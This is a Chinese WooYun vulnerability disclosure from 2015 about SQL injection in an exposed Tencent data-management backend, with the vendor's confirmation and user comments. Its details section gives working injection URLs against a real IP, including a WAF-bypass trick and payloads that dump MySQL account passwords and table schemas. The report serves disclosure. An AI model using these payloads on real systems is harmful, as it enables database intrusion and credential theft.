当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094510

漏洞标题:腾讯某数据管理后台暴露且存在多处sql注入(waf绕过,涉及117w用户)

相关厂商:腾讯

漏洞作者: boooooom

提交时间:2015-01-29 09:34

修复时间:2015-03-15 09:36

公开时间:2015-03-15 09:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-29: 细节已通知厂商并且等待厂商处理中
2015-01-29: 厂商已经确认,细节仅向厂商公开
2015-02-08: 细节向核心白帽子及相关领域专家公开
2015-02-18: 细节向普通白帽子公开
2015-02-28: 细节向实习白帽子公开
2015-03-15: 细节向公众公开

简要描述:

RT

详细说明:

这个叫结构化抽取平台?OP参数存在注入,

http://123.151.12.139/apple/index/?templates=0&type=all&user=&sDate1=2015-01-05'&sDate2=2015-01-28'&op=1


有waf,用这个大牛的这个方法http://zone.wooyun.org/content/16772可以轻松绕过,多看zone,及时加规则呀
(乌云转码bug,你们把\N换成一个斜杠!!!!!!!)

http://123.151.12.139/apple/index/?templates=0&type=all&user=&sDate1=2015-01-05%27&sDate2=2015-01-28%27&op=\Nunion%20select%201,2,3,4,5,user,password,\Nfrom%20mysql.user%20--%20;


直接读mysql账号密码

1.jpg


这个也有注入,

http://123.151.12.139/apple/strategydetail?general_id=77

漏洞证明:

读表结构

http://123.151.12.139/apple/index/?templates=0&type=all&user=&sDate1=2015-01-05%27&sDate2=2015-01-28%27&op=\Nunion%20select%201,2,3,4,TABLE_SCHEMA,table_name,COLUMN_NAME,\Nfrom%20information_schema.COLUMNS%20where%20COLUMN_NAME%20=%20%27op%27%20--%20;


3.jpg


1171421 涉及的用户数,这么多。算少的吧,这产品

6.jpg

修复方案:

用大乌云的产品吧,包治百病

版权声明:转载请注明来源 boooooom@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-29 14:48

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-29 15:12 | 一只寂寞的小鸟 ( 路人 | Rank:3 漏洞数:3 | ส็็็็็็็็็็็็็็็็็็็...)

    沙发 @肉肉

  2. 2015-01-29 16:13 | lsh4ck ( 实习白帽子 | Rank:81 漏洞数:14 | 不是黑客!但是黑客手段都要会?)

    地板

  3. 2015-01-30 16:13 | xsser_w ( 普通白帽子 | Rank:112 漏洞数:33 | 哎)

    教科书式刷洞小王子

  4. 2015-02-20 19:27 | Croxy ( 普通白帽子 | Rank:513 漏洞数:54 | 只会送人头)

    把洞主洞都看了一遍学以致用>.<